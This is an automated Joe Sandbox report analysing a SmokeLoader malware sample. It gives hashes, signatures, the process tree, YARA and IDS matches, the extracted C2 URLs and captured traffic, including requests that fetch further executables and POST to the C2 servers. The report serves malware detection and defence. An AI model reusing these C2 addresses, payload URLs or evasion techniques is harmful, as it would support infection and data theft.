Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HaPJ2rPP6w.exe

Overview

General Information

Sample name:HaPJ2rPP6w.exe
renamed because original name is a hash value
Original sample name:08e3912bd337bff072bd1346ddc39f3a.exe
Analysis ID:1526113
MD5:08e3912bd337bff072bd1346ddc39f3a
SHA1:4968a92e8d90c576ea9bed482b5d36de2254e0e1
SHA256:cae15eb4334c0d36ed9152d852766f970df9a0159895050742ca1036d54b0c37
Tags:exeSocks5Systemzuser-abuse_ch
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara signature match

Classification

  • System is w10x64
  • HaPJ2rPP6w.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\HaPJ2rPP6w.exe" MD5: 08E3912BD337BFF072BD1346DDC39F3A)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
      • C12E.exe (PID: 7924 cmdline: C:\Users\user\AppData\Local\Temp\C12E.exe MD5: 49A8BAC4600ABA0061CD216A4C75185C)
      • 89ED.exe (PID: 7988 cmdline: C:\Users\user\AppData\Local\Temp\89ED.exe MD5: FBFC7A6D58571AF46628818A232931A5)
        • 89ED.exe (PID: 8072 cmdline: "C:\Users\user\AppData\Local\Temp\89ED.exe" -sfxelevation MD5: FBFC7A6D58571AF46628818A232931A5)
  • wideaec (PID: 7736 cmdline: C:\Users\user\AppData\Roaming\wideaec MD5: 08E3912BD337BFF072BD1346DDC39F3A)
  • bbdeaec (PID: 4828 cmdline: C:\Users\user\AppData\Roaming\bbdeaec MD5: 49A8BAC4600ABA0061CD216A4C75185C)
  • bbdeaec (PID: 2364 cmdline: C:\Users\user\AppData\Roaming\bbdeaec MD5: 49A8BAC4600ABA0061CD216A4C75185C)
  • wideaec (PID: 1272 cmdline: C:\Users\user\AppData\Roaming\wideaec MD5: 08E3912BD337BFF072BD1346DDC39F3A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.2053936482.0000000000630000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000006.00000002.2399579094.0000000002160000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1783948879.000000000084E000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x34d5:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.1783799974.00000000006E1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    Click to see the 21 entries
    SourceRuleDescriptionAuthorStrings
    12.3.bbdeaec.5c0000.0.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      6.2.C12E.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        6.2.C12E.exe.2160e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          12.2.bbdeaec.5a0e67.1.raw.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            12.2.bbdeaec.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              Click to see the 1 entries

              System Summary

              barindex
              Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wideaec, CommandLine: C:\Users\user\AppData\Roaming\wideaec, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wideaec, NewProcessName: C:\Users\user\AppData\Roaming\wideaec, OriginalFileName: C:\Users\user\AppData\Roaming\wideaec, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\wideaec, ProcessId: 7736, ProcessName: wideaec
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-04T19:17:31.163380+020020391031A Network Trojan was detected192.168.2.449736177.129.90.10680TCP
              2024-10-04T19:17:32.743839+020020391031A Network Trojan was detected192.168.2.449737177.129.90.10680TCP
              2024-10-04T19:17:34.015007+020020391031A Network Trojan was detected192.168.2.449738177.129.90.10680TCP
              2024-10-04T19:17:35.661779+020020391031A Network Trojan was detected192.168.2.449739177.129.90.10680TCP
              2024-10-04T19:17:37.176772+020020391031A Network Trojan was detected192.168.2.449740177.129.90.10680TCP
              2024-10-04T19:17:38.461103+020020391031A Network Trojan was detected192.168.2.449741177.129.90.10680TCP
              2024-10-04T19:17:39.742990+020020391031A Network Trojan was detected192.168.2.449742177.129.90.10680TCP
              2024-10-04T19:17:41.936055+020020391031A Network Trojan was detected192.168.2.449743177.129.90.10680TCP
              2024-10-04T19:17:43.234932+020020391031A Network Trojan was detected192.168.2.449744177.129.90.10680TCP
              2024-10-04T19:17:44.532366+020020391031A Network Trojan was detected192.168.2.449745177.129.90.10680TCP
              2024-10-04T19:17:46.021153+020020391031A Network Trojan was detected192.168.2.449746177.129.90.10680TCP
              2024-10-04T19:17:47.327483+020020391031A Network Trojan was detected192.168.2.449747177.129.90.10680TCP
              2024-10-04T19:17:48.977509+020020391031A Network Trojan was detected192.168.2.449748177.129.90.10680TCP
              2024-10-04T19:17:50.437179+020020391031A Network Trojan was detected192.168.2.449749177.129.90.10680TCP
              2024-10-04T19:17:51.852257+020020391031A Network Trojan was detected192.168.2.449750177.129.90.10680TCP
              2024-10-04T19:17:53.125210+020020391031A Network Trojan was detected192.168.2.449751177.129.90.10680TCP
              2024-10-04T19:17:54.706817+020020391031A Network Trojan was detected192.168.2.449752177.129.90.10680TCP
              2024-10-04T19:17:55.981022+020020391031A Network Trojan was detected192.168.2.449753177.129.90.10680TCP
              2024-10-04T19:17:57.270101+020020391031A Network Trojan was detected192.168.2.449754177.129.90.10680TCP
              2024-10-04T19:17:58.562666+020020391031A Network Trojan was detected192.168.2.449756177.129.90.10680TCP
              2024-10-04T19:17:59.955931+020020391031A Network Trojan was detected192.168.2.449758177.129.90.10680TCP
              2024-10-04T19:18:01.349075+020020391031A Network Trojan was detected192.168.2.449764177.129.90.10680TCP
              2024-10-04T19:18:02.656822+020020391031A Network Trojan was detected192.168.2.449771177.129.90.10680TCP
              2024-10-04T19:18:04.047722+020020391031A Network Trojan was detected192.168.2.449781177.129.90.10680TCP
              2024-10-04T19:18:06.619406+020020391031A Network Trojan was detected192.168.2.449798177.129.90.10680TCP
              2024-10-04T19:18:08.108094+020020391031A Network Trojan was detected192.168.2.449804177.129.90.10680TCP
              2024-10-04T19:18:09.566598+020020391031A Network Trojan was detected192.168.2.449815177.129.90.10680TCP
              2024-10-04T19:18:11.147908+020020391031A Network Trojan was detected192.168.2.449819177.129.90.10680TCP
              2024-10-04T19:18:12.412956+020020391031A Network Trojan was detected192.168.2.449826177.129.90.10680TCP
              2024-10-04T19:18:13.846347+020020391031A Network Trojan was detected192.168.2.449833177.129.90.10680TCP
              2024-10-04T19:18:19.449251+020020391031A Network Trojan was detected192.168.2.449864177.129.90.10680TCP
              2024-10-04T19:19:30.096822+020020391031A Network Trojan was detected192.168.2.450035177.129.90.10680TCP
              2024-10-04T19:19:37.691008+020020391031A Network Trojan was detected192.168.2.450036177.129.90.10680TCP
              2024-10-04T19:19:47.223334+020020391031A Network Trojan was detected192.168.2.450037177.129.90.10680TCP
              2024-10-04T19:19:58.725636+020020391031A Network Trojan was detected192.168.2.450038177.129.90.10680TCP
              2024-10-04T19:20:14.259793+020020391031A Network Trojan was detected192.168.2.450039180.75.11.13380TCP
              2024-10-04T19:20:28.126238+020020391031A Network Trojan was detected192.168.2.450040180.75.11.13380TCP
              2024-10-04T19:20:42.965243+020020391031A Network Trojan was detected192.168.2.450041180.75.11.13380TCP
              2024-10-04T19:20:57.598842+020020391031A Network Trojan was detected192.168.2.450042180.75.11.13380TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: HaPJ2rPP6w.exeAvira: detected
              Source: C:\Users\user\AppData\Roaming\bbdeaecAvira: detection malicious, Label: HEUR/AGEN.1312571
              Source: C:\Users\user\AppData\Roaming\wideaecAvira: detection malicious, Label: HEUR/AGEN.1312571
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeAvira: detection malicious, Label: HEUR/AGEN.1312571
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeAvira: detection malicious, Label: HEUR/AGEN.1304598
              Source: 00000000.00000002.1783748063.00000000006C0000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nwgrus.ru/tmp/index.php", "http://tech-servers.in.net/tmp/index.php", "http://unicea.ws/tmp/index.php"]}
              Source: C:\Users\user\AppData\Roaming\wideaecReversingLabs: Detection: 34%
              Source: HaPJ2rPP6w.exeReversingLabs: Detection: 34%
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\AppData\Roaming\bbdeaecJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Roaming\wideaecJoe Sandbox ML: detected
              Source: C:\Users\user\AppData\Local\Temp\C12E.exeJoe Sandbox ML: detected
              Source: HaPJ2rPP6w.exeJoe Sandbox ML: detected
              Source: HaPJ2rPP6w.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Users\user\Desktop\HaPJ2rPP6w.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
              Source: unknownHTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49792 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 217.197.91.145:443 -> 192.168.2.4:49843 version: TLS 1.2
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_00000001400040F4 GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,7_2_00000001400040F4
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 7_2_0000000140003A74 FindFirstFileW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPEAX@Z,??3@YAXPEAX@Z,7_2_0000000140003A74
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 4x nop then movzx eax, byte ptr [rdx+07h]7_2_0000000140013940
              Source: C:\Users\user\AppData\Local\Temp\89ED.exeCode function: 4x nop then movsxd r9, rbp7_2_000000014000DDC0

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49804 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49819 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49815 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49781 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49764 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49771 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49826 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49864 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49833 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49798 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50042 -> 180.75.11.133:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50040 -> 180.75.11.133:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50036 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50039 -> 180.75.11.133:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50041 -> 180.75.11.133:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50035 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50038 -> 177.129.90.106:80
              Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50037 -> 177.129.90.106:80
              Source: C:\Windows\explorer.exeNetwork Connect: 217.197.91.145 443Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 180.75.11.133 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 177.129.90.106 80Jump to behavior
              Source: C:\Windows\explorer.exeNetwork Connect: 23.145.40.164 443Jump to behavior
              Source: Malware configuration extractorURLs: http://nwgrus.ru/tmp/index.php
              Source: Malware configuration extractorURLs: http://tech-servers.in.net/tmp/index.php
              Source: Malware configuration extractorURLs: http://unicea.ws/tmp/index.php
              Source: Joe Sandbox ViewIP Address: 177.129.90.106 177.129.90.106
              Source: Joe Sandbox ViewIP Address: 23.145.40.164 23.145.40.164
              Source: Joe Sandbox ViewIP Address: 217.197.91.145 217.197.91.145
              Source: Joe Sandbox ViewASN Name: WEBE-MY-AS-APWEBEDIGITALSDNBHDMY WEBE-MY-AS-APWEBEDIGITALSDNBHDMY
              Source: Joe Sandbox ViewASN Name: Internet58Ltda-MEBR Internet58Ltda-MEBR
              Source: Joe Sandbox ViewASN Name: SURFAIRWIRELESS-IN-01US SURFAIRWIRELESS-IN-01US
              Source: Joe Sandbox ViewASN Name: IN-BERLIN-ASIndividualNetworkBerlineVDE IN-BERLIN-ASIndividualNetworkBerlineVDE
              Source: Joe Sandbox ViewJA3 fingerprint: 72a589da586844d7f0818ce684948eea
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
              Source: global trafficHTTP traffic detected: GET /alexcode11/templates/raw/branch/main/setup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: codeberg.org
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymfsjxxjefdfso.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gaaiqehpdrl.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 197Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nsyybqctivusmhf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gyhesrqsslpwya.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 218Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://adcijuuyqpoytbg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 131Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynyhgoxksqcqux.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://efqngojwjwmo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://slcfgcsbfxfboq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 313Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://soxhctcejph.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://unecmrmecypjdcds.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rsqwlptdbkicnj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qfsgibodkcmgjnhs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iypyxugbhpjfu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wckgnkwavbhg.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 115Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bsjhlaqplgxee.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://msepyhqdoiyw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 239Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ubqbmapskssunnlw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qfqulohrbnuwl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ishmldllgtoat.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 282Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pgccgnhrnlclx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 294Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aavvgkbncxkwcma.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ldwiwwwcudjue.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://msydcfqytkyly.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: nwgrus.ru
              Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ynkhngybxmld.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 280Host: nwgrus.ru
